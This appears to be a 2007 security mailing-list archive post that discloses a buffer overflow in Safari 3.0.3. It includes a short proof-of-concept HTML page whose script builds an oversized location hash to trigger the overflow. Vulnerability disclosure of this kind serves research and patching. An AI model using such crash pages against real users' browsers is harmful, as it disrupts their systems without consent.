Safari 3.0.3 (522.15.5) Buffer overflow
Azizov E. (azizov@itdefence.ru)
- At processing of data, which has more than 65474 bytes in size, occurs buffer overflow.
POC:
<html> <body> <script>
var maxbuf = 65474;
buff = "A";
for (i=0;i<maxbuf;i++) { buff = buff+"A"; }
document.location.hash = buff+"BOW! ";
alert(document.location.hash);
</script> </body> </html> Received on Fri Sep 7 12:40:09 2007
This archive was generated by hypermail 2.1.8
: Sun Oct 28 2007 - 06:14:53 EDT
|